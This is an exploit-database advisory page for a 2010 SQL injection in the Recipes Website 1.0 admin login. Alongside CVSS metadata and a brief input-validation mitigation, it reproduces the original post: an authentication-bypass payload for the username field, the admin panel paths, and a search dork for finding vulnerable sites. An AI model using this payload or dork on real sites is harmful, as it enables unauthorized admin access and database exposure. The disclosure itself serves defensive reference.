header-logo
Suggest Exploit
vendor:
Recipes Website
by:
Mr.ThieF
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Recipes Website
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:scriptsfeed:recipes_website:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Recipes Website 1.0

The Recipes Website 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the application's database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.
Source

Exploit-DB raw data:

[~] Script: | Recipes Website 1.0 |
[~] Author : Mr.ThieF
[~] Contact : LinuxRooT--@hotmail.com <~
[~] DorK : contact_frm.php
[~] Software Link : http://www.scriptsfeed.com
[~] Date : 05-23-2010
[~] Version : 1.0
[~] CVE : 
[~] Exploit :

UserName : admin ' or ' 1=1  & or & ' or 1='1'#

PassworD : xx

Example:

http://[site]/[path]/Recipes_Website/control/

http://[site]/control/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreeTz : RENO <3 - Saudi ViruS TeaM <3 - MMA_LORD_735 <3 - Mr.NrFzH <3 - SaFa7-KsA <3 - T3rr0risT <3 - ALL My FrindS <3

Navigation

Suggest Exploit

Services By CQR